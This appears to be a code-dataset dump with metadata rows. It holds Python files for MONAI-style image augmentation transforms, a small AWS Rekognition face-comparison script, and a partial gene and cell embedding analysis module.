out_val, *_ = convert_to_dst_type(out, dst=img, dtype=np.float32)
return out_val
class Affine(Transform):
backend = list(set(AffineGrid.backend) & set(Resample.backend))
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
rotate_params: Optional[Union[Sequence[float], float]] = None,
shear_params: Optional[Union[Sequence[float], float]] = None,
translate_params: Optional[Union[Sequence[float], float]] = None,
scale_params: Optional[Union[Sequence[float], float]] = None,
affine: Optional[NdarrayOrTensor] = None,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
norm_coords: bool = True,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
dtype: DtypeLike = np.float32,
image_only: bool = False,
) -> None:
self.affine_grid = AffineGrid(
rotate_params=rotate_params,
shear_params=shear_params,
translate_params=translate_params,
scale_params=scale_params,
affine=affine,
dtype=dtype,
device=device,
)
self.image_only = image_only
self.resampler = Resample(norm_coords=norm_coords, device=device, dtype=dtype)
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
) -> Union[NdarrayOrTensor, Tuple[NdarrayOrTensor, NdarrayOrTensor]]:
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
grid, affine = self.affine_grid(spatial_size=sp_size)
ret = self.resampler(img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode)
return ret if self.image_only else (ret, affine)
class RandAffine(RandomizableTransform):
backend = Affine.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
cache_grid: bool = False,
as_tensor_output: bool = True,
device: Optional[torch.device] = None,
) -> None:
RandomizableTransform.__init__(self, prob)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.spatial_size = spatial_size
self.cache_grid = cache_grid
self._cached_grid = self._init_identity_cache()
self.mode: GridSampleMode = GridSampleMode(mode)
self.padding_mode: GridSamplePadMode = GridSamplePadMode(padding_mode)
def _init_identity_cache(self):
if self.spatial_size is None:
if self.cache_grid:
warnings.warn(
"cache_grid=True is not compatible with the dynamic spatial_size, please specify 'spatial_size'."
)
return None
_sp_size = ensure_tuple(self.spatial_size)
_ndim = len(_sp_size)
if _sp_size != fall_back_tuple(_sp_size, [1] * _ndim) or _sp_size != fall_back_tuple(_sp_size, [2] * _ndim):
# dynamic shape because it falls back to different outcomes
if self.cache_grid:
warnings.warn(
"cache_grid=True is not compatible with the dynamic spatial_size "
f"'spatial_size={self.spatial_size}', please specify 'spatial_size'."
)
return None
return create_grid(spatial_size=_sp_size, device=self.rand_affine_grid.device, backend="torch")
def get_identity_grid(self, spatial_size: Sequence[int]):
ndim = len(spatial_size)
if spatial_size != fall_back_tuple(spatial_size, [1] * ndim) or spatial_size != fall_back_tuple(
spatial_size, [2] * ndim
):
raise RuntimeError(f"spatial_size should not be dynamic, got {spatial_size}.")
return (
create_grid(spatial_size=spatial_size, device=self.rand_affine_grid.device, backend="torch")
if self._cached_grid is None
else self._cached_grid
)
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "RandAffine":
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, data: Optional[Any] = None) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Sequence[int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
if randomize:
self.randomize()
# if not doing transform and spatial size doesn't change, nothing to do
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
do_resampling = self._do_transform or (sp_size != ensure_tuple(img.shape[1:]))
if not do_resampling:
img, *_ = convert_data_type(img, dtype=torch.float32, device=self.resampler.device)
grid = self.get_identity_grid(sp_size)
if self._do_transform:
grid = self.rand_affine_grid(grid=grid)
out: NdarrayOrTensor = self.resampler(
img=img, grid=grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class Rand2DElastic(RandomizableTransform):
backend = Resample.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
spacing: Union[Tuple[float, float], float],
magnitude_range: Tuple[float, float],
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Tuple[int, int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
as_tensor_output: bool = False,
device: Optional[torch.device] = None,
) -> None:
RandomizableTransform.__init__(self, prob)
self.deform_grid = RandDeformGrid(
spacing=spacing, magnitude_range=magnitude_range, as_tensor_output=True, device=device
)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.device = device
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Rand2DElastic":
self.deform_grid.set_random_state(seed, state)
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, spatial_size: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.deform_grid.randomize(spatial_size)
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Tuple[int, int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
if randomize:
self.randomize(spatial_size=sp_size)
if self._do_transform:
grid = self.deform_grid(spatial_size=sp_size)
grid = self.rand_affine_grid(grid=grid)
grid = torch.nn.functional.interpolate(
recompute_scale_factor=True,
input=grid.unsqueeze(0),
scale_factor=list(ensure_tuple(self.deform_grid.spacing)),
mode=InterpolateMode.BICUBIC.value,
align_corners=False,
)
grid = CenterSpatialCrop(roi_size=sp_size)(grid[0])
else:
_device = img.device if isinstance(img, torch.Tensor) else self.device
grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
out: NdarrayOrTensor = self.resampler(
img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class Rand3DElastic(RandomizableTransform):
backend = Resample.backend
@deprecated_arg(name="as_tensor_output", since="0.6")
def __init__(
self,
sigma_range: Tuple[float, float],
magnitude_range: Tuple[float, float],
prob: float = 0.1,
rotate_range: RandRange = None,
shear_range: RandRange = None,
translate_range: RandRange = None,
scale_range: RandRange = None,
spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.REFLECTION,
as_tensor_output: bool = False,
device: Optional[torch.device] = None,
) -> None:
RandomizableTransform.__init__(self, prob)
self.rand_affine_grid = RandAffineGrid(
rotate_range=rotate_range,
shear_range=shear_range,
translate_range=translate_range,
scale_range=scale_range,
device=device,
)
self.resampler = Resample(device=device)
self.sigma_range = sigma_range
self.magnitude_range = magnitude_range
self.spatial_size = spatial_size
self.mode: GridSampleMode = look_up_option(mode, GridSampleMode)
self.padding_mode: GridSamplePadMode = look_up_option(padding_mode, GridSamplePadMode)
self.device = device
self.rand_offset: np.ndarray
self.magnitude = 1.0
self.sigma = 1.0
def set_random_state(
self, seed: Optional[int] = None, state: Optional[np.random.RandomState] = None
) -> "Rand3DElastic":
self.rand_affine_grid.set_random_state(seed, state)
super().set_random_state(seed, state)
return self
def randomize(self, grid_size: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return None
self.rand_offset = self.R.uniform(-1.0, 1.0, [3] + list(grid_size)).astype(np.float32, copy=False)
self.magnitude = self.R.uniform(self.magnitude_range[0], self.magnitude_range[1])
self.sigma = self.R.uniform(self.sigma_range[0], self.sigma_range[1])
self.rand_affine_grid.randomize()
def __call__(
self,
img: NdarrayOrTensor,
spatial_size: Optional[Union[Tuple[int, int, int], int]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
sp_size = fall_back_tuple(spatial_size or self.spatial_size, img.shape[1:])
if randomize:
self.randomize(grid_size=sp_size)
_device = img.device if isinstance(img, torch.Tensor) else self.device
grid = create_grid(spatial_size=sp_size, device=_device, backend="torch")
if self._do_transform:
if self.rand_offset is None:
raise RuntimeError("rand_offset is not initialized.")
gaussian = GaussianFilter(3, self.sigma, 3.0).to(device=_device)
offset = torch.as_tensor(self.rand_offset, device=_device).unsqueeze(0)
grid[:3] += gaussian(offset)[0] * self.magnitude
grid = self.rand_affine_grid(grid=grid)
out: NdarrayOrTensor = self.resampler(
img, grid, mode=mode or self.mode, padding_mode=padding_mode or self.padding_mode
)
return out
class GridDistortion(Transform):
backend = [TransformBackends.TORCH]
def __init__(
self,
num_cells: Union[Tuple[int], int],
distort_steps: Sequence[Sequence[float]],
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
device: Optional[torch.device] = None,
) -> None:
self.resampler = Resample(mode=mode, padding_mode=padding_mode, device=device)
self.num_cells = num_cells
self.distort_steps = distort_steps
self.device = device
def __call__(
self,
img: NdarrayOrTensor,
distort_steps: Optional[Sequence[Sequence]] = None,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
) -> NdarrayOrTensor:
distort_steps = self.distort_steps if distort_steps is None else distort_steps
if len(img.shape) != len(distort_steps) + 1:
raise ValueError("the spatial size of `img` does not match with the length of `distort_steps`")
all_ranges = []
num_cells = ensure_tuple_rep(self.num_cells, len(img.shape) - 1)
for dim_idx, dim_size in enumerate(img.shape[1:]):
dim_distort_steps = distort_steps[dim_idx]
ranges = torch.zeros(dim_size, dtype=torch.float32)
cell_size = dim_size // num_cells[dim_idx]
prev = 0
for idx in range(num_cells[dim_idx] + 1):
start = int(idx * cell_size)
end = start + cell_size
if end > dim_size:
end = dim_size
cur = dim_size
else:
cur = prev + cell_size * dim_distort_steps[idx]
ranges[start:end] = torch.linspace(prev, cur, end - start)
prev = cur
ranges = ranges - (dim_size - 1.0) / 2.0
all_ranges.append(ranges)
coords = meshgrid_ij(*all_ranges)
grid = torch.stack([*coords, torch.ones_like(coords[0])])
return self.resampler(img, grid=grid, mode=mode, padding_mode=padding_mode)
class RandGridDistortion(RandomizableTransform):
backend = [TransformBackends.TORCH]
def __init__(
self,
num_cells: Union[Tuple[int], int] = 5,
prob: float = 0.1,
distort_limit: Union[Tuple[float, float], float] = (-0.03, 0.03),
mode: Union[GridSampleMode, str] = GridSampleMode.BILINEAR,
padding_mode: Union[GridSamplePadMode, str] = GridSamplePadMode.BORDER,
device: Optional[torch.device] = None,
) -> None:
RandomizableTransform.__init__(self, prob)
self.num_cells = num_cells
if isinstance(distort_limit, (int, float)):
self.distort_limit = (min(-distort_limit, distort_limit), max(-distort_limit, distort_limit))
else:
self.distort_limit = (min(distort_limit), max(distort_limit))
self.distort_steps: Sequence[Sequence[float]] = ((1.0,),)
self.grid_distortion = GridDistortion(
num_cells=num_cells, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode, device=device
)
def randomize(self, spatial_shape: Sequence[int]) -> None:
super().randomize(None)
if not self._do_transform:
return
self.distort_steps = tuple(
tuple(1.0 + self.R.uniform(low=self.distort_limit[0], high=self.distort_limit[1], size=n_cells + 1))
for n_cells in ensure_tuple_rep(self.num_cells, len(spatial_shape))
)
def __call__(
self,
img: NdarrayOrTensor,
mode: Optional[Union[GridSampleMode, str]] = None,
padding_mode: Optional[Union[GridSamplePadMode, str]] = None,
randomize: bool = True,
) -> NdarrayOrTensor:
if randomize:
self.randomize(img.shape[1:])
if not self._do_transform:
return img
return self.grid_distortion(img, distort_steps=self.distort_steps, mode=mode, padding_mode=padding_mode)
| true | true |
f7327b0acca1ec68ef13a676068181bf6461221b | 43 | py | Python | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | passbook/audit/urls.py | fossabot/passbook | cba17f6659404445ac3025f11657d89368cc8b4f | [
"MIT"
] | null | null | null | """passbook audit urls"""
urlpatterns = []
| 14.333333 | 25 | 0.651163 | urlpatterns = []
| true | true |
f7327ef8305d5caec9af3eb2d964b224057a2427 | 1,539 | py | Python | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | 3 | 2020-03-24T16:26:35.000Z | 2020-04-15T19:40:41.000Z | AI/others/aws_rekognition/test_compare_faces/main.py | honchardev/Fun | ca7c0076e9bb3017c5d7e89aa7d5bd54a83c8ecc | [
"MIT"
] | null | null | null | from dotenv import load_dotenv
import os
import boto3
# Define constants
load_dotenv()
AWS_USERNAME = os.environ['aws_username']
AWS_BUCKET = os.environ['aws_bucket']
AWS_REGION = os.environ['aws_region']
AWS_ACCESS_KEY_ID = os.environ['aws_access_key_id']
AWS_SECRET_ACCESS_KEY = os.environ['aws_secret_access_key']
# Initialize rekognition client
aws_rekognition_client = boto3.client(
service_name='rekognition',
region_name=AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY
)
print('DBG: Client initialized')
# Preload images
img_folder_path = './img'
me_and_passport_img_filename = '2020-10-16-114752.jpg'
me_img_filename = '2020-10-16-114805.jpg'
passport_img_filename = '2020-10-16-114818.jpg'
me_and_passport_img_bytes = open('{0}/{1}'.format(img_folder_path, me_and_passport_img_filename), 'rb').read()
me_img_bytes = open('{0}/{1}'.format(img_folder_path, me_img_filename), 'rb').read()
passport_img_bytes = open('{0}/{1}'.format(img_folder_path, passport_img_filename), 'rb').read()
print('DBG: Images preloaded')
# Fetch compare_faces results
compare_faces_params = {
'SourceImage': {
'Bytes': me_img_bytes
},
'TargetImage': {
'Bytes': passport_img_bytes
},
'SimilarityThreshold': 70,
'QualityFilter': 'AUTO' # 'NONE'|'AUTO'|'LOW'|'MEDIUM'|'HIGH'
}
response = aws_rekognition_client.compare_faces(**compare_faces_params)
print(response)
print('DBG: Fetched response from compare_faces')
print('DBG: end of script')
| 27.482143 | 110 | 0.747238 | from dotenv import load_dotenv
import os
import boto3
load_dotenv()
AWS_USERNAME = os.environ['aws_username']
AWS_BUCKET = os.environ['aws_bucket']
AWS_REGION = os.environ['aws_region']
AWS_ACCESS_KEY_ID = os.environ['aws_access_key_id']
AWS_SECRET_ACCESS_KEY = os.environ['aws_secret_access_key']
aws_rekognition_client = boto3.client(
service_name='rekognition',
region_name=AWS_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY
)
print('DBG: Client initialized')
img_folder_path = './img'
me_and_passport_img_filename = '2020-10-16-114752.jpg'
me_img_filename = '2020-10-16-114805.jpg'
passport_img_filename = '2020-10-16-114818.jpg'
me_and_passport_img_bytes = open('{0}/{1}'.format(img_folder_path, me_and_passport_img_filename), 'rb').read()
me_img_bytes = open('{0}/{1}'.format(img_folder_path, me_img_filename), 'rb').read()
passport_img_bytes = open('{0}/{1}'.format(img_folder_path, passport_img_filename), 'rb').read()
print('DBG: Images preloaded')
compare_faces_params = {
'SourceImage': {
'Bytes': me_img_bytes
},
'TargetImage': {
'Bytes': passport_img_bytes
},
'SimilarityThreshold': 70,
'QualityFilter': 'AUTO'
}
response = aws_rekognition_client.compare_faces(**compare_faces_params)
print(response)
print('DBG: Fetched response from compare_faces')
print('DBG: end of script')
| true | true |
f7327eff75f87ec7bbe56c0c96e4299744d97d89 | 22,181 | py | Python | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | compass/embedding.py | seitalab/compass | b08b0b711875e8e049ff07793ffe1446a6c3f144 | [
"MIT"
] | null | null | null | from sklearn.metrics.pairwise import cosine_similarity
from sklearn.manifold import TSNE
from sklearn.cluster import AgglomerativeClustering, KMeans
from sklearn.preprocessing import MinMaxScaler
import matplotlib.pyplot as plt
import matplotlib
import seaborn as sns
import pandas
import matplotlib.cm as cm
import umap
import tqdm
import scanpy as sc
import matplotlib.gridspec as gridspec
import networkx as nx
import numpy
import operator
import random
import pickle
import collections
import sys
import os
class GeneEmbedding(object):
def __init__(self, embedding_file, context):
self.vector = []
self.context = context
self.embedding_file = embedding_file
self.embeddings = self.read_embedding(self.embedding_file)
self.vector = []
self.genes = []
for gene in tqdm.tqdm(self.context.expressed_genes):
if gene in self.embeddings:
self.vector.append(self.embeddings[gene])
self.genes.append(gene)
def read_embedding(self, filename):
embedding = dict()
lines = open(filename,"r").read().splitlines()[1:]
for line in lines:
vector = line.split()
gene = vector.pop(0)
embedding[gene] = [float(x) for x in vector]
return embedding
def compute_similarities(self, gene, subset=None):
print("hit")
if gene not in self.embeddings:
return None
embedding = self.embeddings[gene]
distances = dict()
if subset:
targets = set(list(self.embeddings.keys())).intersection(set(subset))
else:
targets = list(self.embeddings.keys())
for target in targets:
if target not in self.embeddings:
continue
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(embedding).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
genes = [x[0] for x in sorted_distances]
distance = [x[1] for x in sorted_distances]
df = pandas.DataFrame.from_dict({"Gene":genes, "Similarity":distance})
return df
def cluster(self, n=12):
kmeans = KMeans(n_clusters=n)
kmeans.fit(self.vector)
clusters = kmeans.labels_
clusters = zip(self.context.expressed_genes, clusters)
_clusters = []
for gene, cluster in clusters:
_clusters.append("G"+str(cluster))
return _clusters
def clusters(self, clusters):
average_vector = dict()
gene_to_cluster = collections.defaultdict(list)
matrix = collections.defaultdict(list)
total_average_vector = []
for gene, cluster in zip(self.context.expressed_genes, clusters):
if gene in self.embeddings:
matrix[cluster].append(self.embeddings[gene])
gene_to_cluster[cluster].append(gene)
total_average_vector.append(self.embeddings[gene])
self.total_average_vector = list(numpy.average(total_average_vector, axis=0))
for cluster, vectors in matrix.items():
xvec = list(numpy.average(vectors, axis=0))
average_vector[cluster] = numpy.subtract(xvec,self.total_average_vector)
return average_vector, gene_to_cluster
def generate_vector(self, genes):
vector = []
for gene, vec in zip(self.genes, self.vector):
if gene in genes:
vector.append(vec)
return list(numpy.median(vector, axis=0))
def cluster_definitions(self, clusters):
average_vector, gene_to_cluster = self.clusters(clusters)
similarities = collections.defaultdict(dict)
for cluster, vector in average_vector.items():
distances = dict()
for target in gene_to_cluster[cluster]:
v = self.embeddings[target]
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(v).reshape(1, -1))[0])
distances[target] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
similarities[cluster] = [x[0] for x in sorted_distances if x[0]]
return similarities
def cluster_definitions_as_df(self, similarities, top_n=20):
clusters = []
symbols = []
for key, genes in similarities.items():
clusters.append(key)
symbols.append(", ".join(genes[:top_n]))
df = pandas.DataFrame.from_dict({"Cluster Name":clusters, "Top Genes":symbols})
return df
def plot(self, clusters, png=None, method="TSNE", labels=[], pcs=None, remove=[]):
plt.figure(figsize = (8, 8))
ax = plt.subplot(1,1,1)
pcs = self.plot_reduction(clusters, ax, labels=labels, method=method, pcs=pcs, remove=remove)
if png:
plt.savefig(png)
plt.close()
else:
plt.show()
return pcs
def plot_reduction(self, clusters, ax, method="TSNE", labels=[], pcs=None, remove=[]):
if type(pcs) != numpy.ndarray:
if method == "TSNE":
print("Running t-SNE")
pca = TSNE(n_components=2, n_jobs=-1, metric="cosine")
pcs = pca.fit_transform(self.vector)
pcs = numpy.transpose(pcs)
print("Finished.")
else:
print("Running UMAP")
trans = umap.UMAP(random_state=42,metric='cosine').fit(self.vector)
x = trans.embedding_[:, 0]
y = trans.embedding_[:, 1]
pcs = [x,y]
print("Finished.")
if len(remove) != 0:
_pcsx = []
_pcsy = []
_clusters = []
for x, y, c in zip(pcs[0],pcs[1],clusters):
if c not in remove:
_pcsx.append(x)
_pcsy.append(y)
_clusters.append(c)
pcs = []
pcs.append(_pcsx)
pcs.append(_pcsy)
clusters = _clusters
data = {"x":pcs[0],"y":pcs[1], "Cluster":clusters}
df = pandas.DataFrame.from_dict(data)
sns.scatterplot(data=df,x="x", y="y",hue="Cluster", ax=ax)
plt.xlabel("{}-1".format(method))
plt.ylabel("{}-2".format(method))
ax.set_xticks([])
ax.set_yticks([])
if len(labels):
for x, y, gene in zip(pcs[0], pcs[1], self.context.expressed_genes):
if gene in labels:
ax.text(x+.02, y, str(gene), fontsize=8)
return pcs
def subtract_vector(self, vector):
for gene, vec in self.embeddings.items():
vec = numpy.subtract(vec-vector)
self.embeddings[gene] = vec
@staticmethod
def relabel_cluster(similarities, clusters, old_label, new_label):
genes = similarities[old_label]
del similarities[old_label]
similarities[new_label] = genes
_clusters = []
for cluster in clusters:
if cluster == old_label:
_clusters.append(new_label)
else:
_clusters.append(cluster)
return similarities, _clusters
def plot_similarity_matrix(self, markers, marker_labels=None, png=None):
cmap = matplotlib.cm.tab20
if marker_labels:
marker_colors = {}
ctypes = []
for value in marker_labels.values():
ctypes.append(value)
ctypes = list(set(ctypes))
for key, value in marker_labels.items():
marker_colors[key] = cmap(ctypes.index(value))
colors = pandas.DataFrame(markers)[0].map(marker_colors)
similarity_matrix = []
print("Running")
markers = set(list(self.embeddings.keys())).intersection(set(markers))
markers = list(markers)
for marker in markers:
print(marker)
row = []
res = self.compute_similarities(marker, subset=markers)
resdict = dict(zip(res["Gene"],res["Similarity"]))
for gene in markers:
row.append(resdict[gene])
similarity_matrix.append(row)
plt.figure(figsize = (12, 10))
matrix = numpy.array(similarity_matrix)
df = pandas.DataFrame(matrix,index=markers,columns=markers)
sns.clustermap(df,figsize=(12,8), dendrogram_ratio=0.1)
plt.tight_layout()
if png:
plt.savefig("marker_similarity.png")
else:
plt.show()
def plot_similarity_network(self, markers, marker_labels=None, png=None):
cmap = matplotlib.cm.tab20
G = nx.petersen_graph()
node_color = []
node_order = []
node_size = []
edge_order = []
edge_color = []
edge_labels = dict()
for marker in markers:
node_order.append(marker)
if marker_labels:
ctypes = []
for value in marker_labels.values():
ctypes.append(value)
ctypes = list(set(ctypes))
node_color.append(ctypes.index(marker_labels[marker]))
node_size.append(400)
G.add_node(marker)
for marker in markers:
res = self.compute_similarities(marker)
resdict = dict(zip(res["Gene"],res["Similarity"]))
i = 0
for gene, similarity in resdict.items():
if i > 9: break
if gene != marker:
if gene not in G.nodes():
node_size.append(0)
G.add_node(gene)
node_order.append(gene)
node_color.append(len(set(marker_labels.values())))
print(marker, gene)
G.add_edge(marker, gene, weight=similarity)
edge_color.append(similarity)
edge_order.append((marker,gene))
edge_labels[(marker,gene)] = str(round(similarity,2))
i += 1
# print(node_color)
# c = max(nx.connected_components(G), key=len)
# G = G.subgraph(c).copy()
for i in range(10):
G.remove_node(i)
print(G.nodes())
print(G.edges())
fig = plt.figure(figsize=(8,8))
ax = plt.subplot(1,1,1)
#pos = nx.nx_agraph.graphviz_layout(G, prog="neato",args="-Goverlap=scale")
pos = nx.nx_agraph.graphviz_layout(G, prog="neato",args="-Goverlap=scale -Elen=5 -Eweight=0.2")
#pos = nx.spring_layout(G)
nx.draw(G,pos,ax=ax, cmap=cmap,nodelist=node_order, node_size=node_size,edgelist=edge_order, node_color=node_color, edge_color=edge_color, edge_vmin=0, edge_vmax=1.0, edge_cmap=plt.cm.Greys, with_labels=True, width=1,font_size=7)
nx.draw_networkx_edge_labels(G,pos,edge_labels=edge_labels, font_size=6)
plt.axis('off')
plt.tight_layout()
if png:
plt.savefig(png)
else:
plt.show()
class CellEmbedding(object):
def __init__(self, context, embed):
cell_to_gene = list(context.cell_to_gene.items())
self.context = context
self.embed = embed
self.expression = context.expression
self.data = collections.defaultdict(list)
self.weights = collections.defaultdict(list)
for cell, genes in tqdm.tqdm(cell_to_gene):
if len(genes) < 2: continue
if cell in self.expression:
cell_weights = self.expression[cell]
for gene in set(genes).intersection(set(embed.embeddings.keys())):
if gene in cell_weights:
weight = self.expression[cell][gene]
if weight > 0:
self.data[cell].append(embed.embeddings[gene])
self.weights[cell].append(weight)
self.matrix = []
dataset_vector = []
for cell, vectors in self.data.items():
weights = self.weights[cell]
xvec = list(numpy.average(vectors, axis=0, weights=weights))
self.matrix.append(xvec)
dataset_vector += vectors
self.dataset_vector = numpy.average(dataset_vector, axis=0)
_matrix = []
for vec in self.matrix:
_matrix.append(numpy.subtract(vec, self.dataset_vector))
self.matrix = _matrix
def batch_correct(self, column=None, clusters=None):
if not column or not clusters:
raise ValueError("Must supply batch column and clusters!")
column_labels = dict(zip(self.context.cells,self.context.metadata[column]))
labels = []
for key in self.data.keys():
labels.append(column_labels[key])
local_correction = collections.defaultdict(lambda : collections.defaultdict(list))
correction_vectors = collections.defaultdict(dict)
for cluster, batch, vec in zip(clusters, labels, self.matrix):
local_correction[cluster][batch].append(vec)
for cluster, batches in local_correction.items():
cluster_vec = []
batch_keys = list(batches.keys())
base_batch = batch_keys.pop(0)
max_distance = 1.0
cluster_vec = numpy.average(batches[base_batch], axis=0)
for batch in batch_keys:
bvec = list(numpy.average(batches[batch], axis=0))
distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
if max_distance > distance:
max_distance = distance
offset = numpy.subtract(cluster_vec,bvec)
bvec = numpy.add(bvec,offset)
distance = float(cosine_similarity(numpy.array(bvec).reshape(1, -1),numpy.array(cluster_vec).reshape(1, -1))[0])
correction_vectors[cluster][batch] = offset
self.matrix = []
self.sample_vector = collections.defaultdict(list)
i = 0
self.cell_order = []
for cell, vectors in self.data.items():
cluster = clusters[i]
xvec = list(numpy.average(vectors, axis=0))
batch = column_labels[cell]
if cluster in correction_vectors and batch in correction_vectors[cluster]:
offset = correction_vectors[cluster][batch]
xvec = numpy.add(xvec,offset)
self.matrix.append(xvec)
self.cell_order.append(cell)
i += 1
def cluster(self, k=12):
kmeans = KMeans(n_clusters=k)
kmeans.fit(self.matrix)
clusters = kmeans.labels_
_clusters = []
for cluster in clusters:
_clusters.append("C"+str(cluster))
self.clusters = _clusters
return _clusters
def subtract_vector(self, vector):
corrected_matrix = []
for cell_vector in self.matrix:
corrected_matrix.append(numpy.subtract(cell_vector, vector))
self.matrix = corrected_matrix
def compute_gene_similarities(self):
gene_similarities = dict()
vectors = collections.defaultdict(list)
for vec, label in zip(self.matrix, self.clusters):
vectors[label].append(vec)
for label, vecs in vectors.items():
distances = dict()
cell_vector = list(numpy.mean(vecs, axis=0))
for gene, vector in self.embed.embeddings.items():
distance = float(cosine_similarity(numpy.array(cell_vector).reshape(1, -1),numpy.array(vector).reshape(1, -1))[0])
distances[gene] = distance
sorted_distances = list(reversed(sorted(distances.items(), key=operator.itemgetter(1))))
gene_similarities[label] = [x[0] for x in sorted_distances]
print(label, sorted_distances[:10])
return gene_similarities
def group_cell_vectors(self, barcode_to_label):
label_vector = dict()
labels = []
for cell, vectors in self.data.items():
vector = list(numpy.median(vectors, axis=0))
labels.append(barcode_to_label[cell])
label_vector[barcode_to_label[cell]] = vector
for cell, vectors in self.data.items():
_vectors = []
for vector in vectors:
_vectors.append(numpy.subtract(vector, label_vector[barcode_to_label[cell]]))
vectors = _vectors
vector = list(numpy.median(vectors, axis=0))
label_vector[barcode_to_label[cell]] = vector
return label_vector, labels
def compute_cell_similarities(self, barcode_to_label):
vectors = dict()
cell_similarities = dict()
vectors, labels = self.group_cell_vectors(barcode_to_label)
for label, vector in vectors.items():
distances = dict()
for label2, vector2 in vectors.items():
xdist = []
distance = float(cosine_similarity(numpy.array(vector).reshape(1, -1),numpy.array(vector2).reshape(1, -1))[0])
xdist.append(distance)
distances[label2] = distance
cell_similarities[label] = distances
return cell_similarities
def plot_reduction(self, ax, pcs=None, method="TSNE", clusters=None, labels=None):
